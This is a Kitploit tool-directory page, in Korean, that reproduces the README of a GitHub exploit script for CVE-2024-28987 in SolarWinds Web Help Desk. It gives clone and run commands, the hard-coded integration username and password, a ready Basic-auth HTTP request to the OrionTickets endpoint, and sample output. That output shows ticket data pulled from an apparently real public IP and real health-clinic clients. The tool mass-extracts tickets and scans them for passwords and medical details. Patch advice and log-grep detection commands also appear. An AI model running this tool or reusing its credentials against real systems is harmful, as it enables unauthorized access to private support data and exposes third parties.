Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-28987 — **CVE-2024-28987**는 SolarWinds Web Help Desk(WHD)의 심각한 취약점으로, 원격 공격자가 **하드코딩된 자격 증명**을 사용하여 민감한 티켓 정보에 접근할 수 있게 합니다. 이 취약점은 **CVSS 점수 9.1(치명적)** 을 가지며 실제 환경에서 적극적으로 악용되고 있습니다. | Kitploit
도구/GitHubGitHub/darabium/cve-2024-28987
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPenetration Testing
GitHubdarabium/cve-2024-28987

CVE-2024-28987

**CVE-2024-28987**는 SolarWinds Web Help Desk(WHD)의 심각한 취약점으로, 원격 공격자가 **하드코딩된 자격 증명**을 사용하여 민감한 티켓 정보에 접근할 수 있게 합니다. 이 취약점은 **CVSS 점수 9.1(치명적)** 을 가지며 실제 환경에서 적극적으로 악용되고 있습니다.

저장소 보기
131개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-28987 - SolarWinds Web Help Desk 하드코딩 자격 증명 악용 도구

Python License CVE CVSS

⚠️ 면책 조항: 이 도구는 교육 및 공인된 보안 테스트 목적으로만 사용됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 이 도구는 소유한 시스템이나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.


📋 개요

CVE-2024-28987은 SolarWinds Web Help Desk(WHD)의 치명적인 취약점으로, 원격 공격자가 하드코딩된 자격 증명을 사용하여 민감한 티켓 정보에 접근할 수 있게 합니다. 이 취약점은 CVSS 점수 9.1(치명적) 을 가지며 실제 환경에서 활발히 악용되고 있습니다.

취약점 세부 정보

속성값
CVE IDCVE-2024-28987
CVSS 점수9.1 (치명적)
CWECWE-798 (하드코딩된 자격 증명)
영향받는 제품SolarWinds Web Help Desk ≤ 12.8.3 Hotfix 1
패치 버전12.8.3 Hotfix 2
악용 현황실제 환경에서 활발히 악용됨
CISA KEV 등록2024년 10월 15일

영향

인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  • 민감한 정보가 포함된 모든 지원 티켓에 접근
  • 임시 비밀번호, 재설정 요청 및 공유 서비스 자격 증명 열람
  • /OrionTickets 엔드포인트를 통해 티켓에 대한 CRUD 작업 수행
  • 네트워크의 다른 시스템으로 피벗 가능

🔧 기능

  • ✅ 자동 취약점 탐지 - 하드코딩된 자격 증명 테스트
  • ✅ 티켓 추출 - 취약한 시스템에서 모든 티켓 검색
  • ✅ 민감 데이터 스캔 - 비밀번호, 자격 증명, 개인정보 및 의료 데이터 식별
  • ✅ 다중 출력 형식 - 대용량 데이터셋용 JSON 및 JSONL
  • ✅ 대화형 미리보기 - 추출 전 처음 3개 티켓 표시
  • ✅ 제로 의존성 - Python 표준 라이브러리만 사용
  • ✅ 컬러 출력 - ANSI 색상으로 가독성 향상
  • ✅ 오류 처리 - 연결 오류의 원활한 처리

🚀 빠른 시작

사전 요구 사항

  • Python 3.6 이상
  • 외부 의존성 불필요!

설치

root@kitploit:~
# 저장소 복제
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987

# 스크립트 실행 가능하게 만들기
사용법
bash
# 인자로 대상 URL 지정
python3 cve-2024-28987.py http://target-ip:port

# 대화형 모드 (대상 입력 프롬프트 표시)
python3 cve-2024-28987.py

# 취약한 대상 예시
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 출력 예시
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098

    ╔══════════════════════════════════════════════════════════════════╗
    ║                                                                  ║
    ║   ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██╗  ██╗███████╗ ║
    ║  ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗██║  ██║██╔════╝ ║
    ║  ██║     ██║   ██║█████╗       █████╔╝██║██╔██║███████║█████╗   ║
    ║  ██║     ╚██╗ ██╔╝██╔══╝      ██╔═══╝ ████╔╝██║██╔══██║██╔══╝   ║
    ║  ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝██║  ██║███████╗ ║
    ║   ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝ ║
    ║                                                                  ║
    ║         CVE-2024-28987 - SolarWinds Web Help Desk               ║
    ║         하드코딩된 자격 증명 취약점                              ║
    ║                                                                  ║
    ╠══════════════════════════════════════════════════════════════════╣
    ║  GitHub: https://github.com/Darabium                        ║
    ╚══════════════════════════════════════════════════════════════════╝

[*] http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ 확인 중
[+] 대상이 취약합니다!
[+] 42개의 티켓 발견

======================================================================
[📋] 티켓 미리보기 (처음 3개 티켓)
======================================================================

티켓 #1
  ├── ID: 5690
  ├── 클라이언트: UBS Portao Vermelho
  ├── 상태: 열림
  ├── 세부 내용: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO

티켓 #2
  ├── ID: 5691
  ├── 클라이언트: UBS Centro
  ├── 상태: 진행 중
  ├── 세부 내용: ALCOOL 70% - Solicitação de material de limpeza

======================================================================
[🔐] 민감 데이터 스캔 중
======================================================================

[!] 티켓 #5723에서 잠재적 PASSWORD 데이터 발견
    └── 세부 내용: 시스템 접근을 위한 비밀번호 재설정 요청...

[?] 모든 티켓을 파일로 추출하시겠습니까? [y/N]: y

[*] 저장 중: 138_94_193_65_8098_tickets.json
[✓] 138_94_193_65_8098_tickets.json 저장 완료
[*] 파일 크기: 42,847 바이트
[*] 총 티켓 수: 42

[*] 완료!

GitHub: https://github.com/Darabium

📁 파일 구조

CVE-2024-28987/

├── cve-2024-28987.py # 주요 악용 스크립트

├── README.md # 이 파일

└── LICENSE # MIT 라이선스

출력 파일

티켓을 추출하면 다음 파일이 생성됩니다:

표준 JSON 형식 (항상 생성됨)

138_94_193_65_8098_tickets.json

JSONL 형식 (티켓이 100개를 초과할 때 생성됨)

***_tickets.jsonl 🔍 기술적 세부 정보 하드코딩된 자격 증명 python USERNAME = "helpdeskIntegrationUser" PASSWORD = "dev-C4F8025E7" 영향받는 엔드포인트 text /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ 샘플 HTTP 요청 http GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: vulnerable-target:8098 Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw== Content-Type: application/x-www-form-urlencoded 🛡️ 해결 방안 즉시 조치 SolarWinds Web Help Desk 버전 12.8.3 Hotfix 2 이상으로 즉시 업데이트

/OrionTickets 엔드포인트에 대한 의심스러운 접근 로그 확인

티켓 데이터에 대한 무단 접근 모니터링

티켓에 노출되었을 수 있는 모든 자격 증명 재설정

잠재적 데이터 유출에 대한 모든 지원 티켓 검토

탐지 명령어 bash

로그에서 악용 시도 확인

grep -i "OrionTickets" /var/log/webhelpdesk/access.log

무단 접근 패턴 확인

grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log

현재 버전 확인

cat /opt/WebHelpDesk/version.txt 🚨 CISA KEV 권고 이 취약점은 CISA의 KEV(알려진 악용 취약점) 카탈로그에 등록되었습니다. 조직은 지정된 기한까지 패치를 적용해야 합니다.

등록 날짜: 2024년 10월 15일

필수 조치: 공급업체 지침에 따라 업데이트 적용

기한: 2024년 11월 5일 (21일)

📚 참고 자료 NVD CVE-2024-28987

CISA KEV 카탈로그

SolarWinds 보안 권고

PEP 668 - 외부 환경 관리

🤝 기여 기여를 환영합니다! 풀 리퀘스트를 제출하거나 이슈를 열어 주세요.

지침 저장소를 포크합니다

기능 브랜치를 생성합니다 (git checkout -b feature/AmazingFeature)

변경 사항을 커밋합니다 (git commit -m 'Add some AmazingFeature')

브랜치에 푸시합니다 (git push origin feature/AmazingFeature)

풀 리퀘스트를 엽니다

📝 라이선스 이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.

⚡ 작성자 Darabium - 초기 작업 - GitHub

⚠️ 중요 참고 사항 이 도구는 보안 연구 및 교육 목적으로 제작되었습니다

소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에는 사용하지 마십시오

작성자는 이 도구의 오용에 대해 책임을 지지 않습니다

항상 책임 있는 공개 관행을 따르십시오

관할 지역의 개인정보 보호 및 데이터 보호 법률을 준수하십시오

🌟 스타 기록 이 도구가 유용하다면 GitHub에서 ⭐을 눌러 주세요!

📞 지원 버그 신고는 GitHub에 이슈를 열어 주세요

보안 관련 문의는 GitHub를 통해 직접 연락해 주세요

Darabium을 위해 ❤️로 제작됨

도구 다운로드